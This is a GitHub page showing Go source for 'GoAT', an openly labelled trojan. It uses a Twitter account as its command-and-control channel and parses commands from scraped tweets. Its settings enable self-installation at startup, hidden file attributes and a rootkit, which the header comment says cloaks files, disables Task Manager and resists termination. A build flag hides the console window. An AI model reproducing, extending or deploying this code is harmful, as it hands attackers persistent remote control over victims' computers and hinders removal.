-
Notifications
You must be signed in to change notification settings - Fork 54
/
Copy pathGoAT.go
137 lines (111 loc) · 3.26 KB
/
GoAT.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
/*
GoAT (Golang Advanced Trojan) -- Version 0.5 Beta
by Peter Cunha
http://petercunha.com
https://github.com/petercunha
This is a trojan made in Go, using Twitter as a the C&C server.
COMMANDS:
!echo <message> - Logs message to slave console
!quit - Closes GoAT
!clear - Tells GoAT to do nothing. Use this command if you don't want slaves to execute latest command on connect.
NOTE: Compile with go build -o GoAT.exe -ldflags "-H windowsgui" "C:\GoAT.go" to have no console show.
TODO:
- Commands
- DDoS
- Send messagebox
- Uninstall
- Shutdown/Restart
*/
package main
import (
// Native packages
"fmt"
"io/ioutil"
"net/http"
"strings"
"time"
"os"
// Homemade packages
"command"
"installer"
"rootkit"
)
var (
commander string = "GolangAT" // Twitter account for Command & Control
slumber time.Duration = 5 // Time to wait between checking for commands (in seconds)
cmd string = "" // Stores latest command. Do not change this variable.
// DO NOT ENABLE THE BELOW COMMANDS UNLESS YOU KNOW YOUR SHIT!
enable_install bool = true // If enabled, GoAT will add itelf to startup
enable_stealth bool = true // If enabled, GoAT will add hidden and system attributes to its files
enable_rootkit bool = true /* If enabled, this will:
- Actively cloak GoAT's files from user detection
- Actively monitor registry to prevent removal from start up
- Disable task manager and other system tools
- Protect GoAT's process from termination */
)
func main() {
fmt.Println("GoAT (Golang Advanced Trojan) Loaded.\n")
fmt.Println("SETTINGS")
fmt.Println("Location:\t\t", os.Args[0])
fmt.Println("Commander:\t\t", commander)
fmt.Println("Refresh interval:\t", int(slumber))
fmt.Println("Install:\t\t", isTrue(enable_install))
fmt.Println("Stealth:\t\t", isTrue(enable_stealth))
fmt.Println("Rootkit:\t\t", isTrue(enable_rootkit), "\n")
if enable_install {
installer.Install()
}
if enable_stealth && enable_install {
rootkit.Stealthify()
}
if enable_rootkit && enable_stealth && enable_install {
go rootkit.Install()
}
fmt.Println("Commander:\t\t", commander)
fmt.Println("Refresh interval:\t", int(slumber), "\n")
fmt.Println("Awaiting commands...")
for true {
go refresh()
time.Sleep(time.Second * slumber)
}
}
func refresh() {
lines := getContent()
if lines == nil {
return
}
for i := 0; i < len(lines); i++ {
if strings.Contains(lines[i], "data-aria-label-part=\"0\">") {
temp := strings.Split(strings.Split(lines[i], "data-aria-label-part=\"0\">")[1], "<")[0]
if cmd != temp && !strings.Contains(temp, "!clear") {
cmd = temp
fmt.Println("New command found:", cmd)
command.Parse(cmd)
} else if strings.Contains(temp, "!clear") {
cmd = "!clear"
}
i = len(lines)
}
}
}
func getContent() (lines []string) {
res, err := http.Get("https://twitter.com/" + commander)
if err != nil {
fmt.Println("Bad connection! Sleeping for", int(slumber), "seconds")
return nil
}
content, err := ioutil.ReadAll(res.Body)
res.Body.Close()
if err != nil {
fmt.Println("Bad connection! Sleeping for", int(slumber), "seconds")
return nil
}
return strings.Split(string(content), "\n")
}
func isTrue(option bool) string {
if option {
return "Yes"
} else {
return "No"
}
}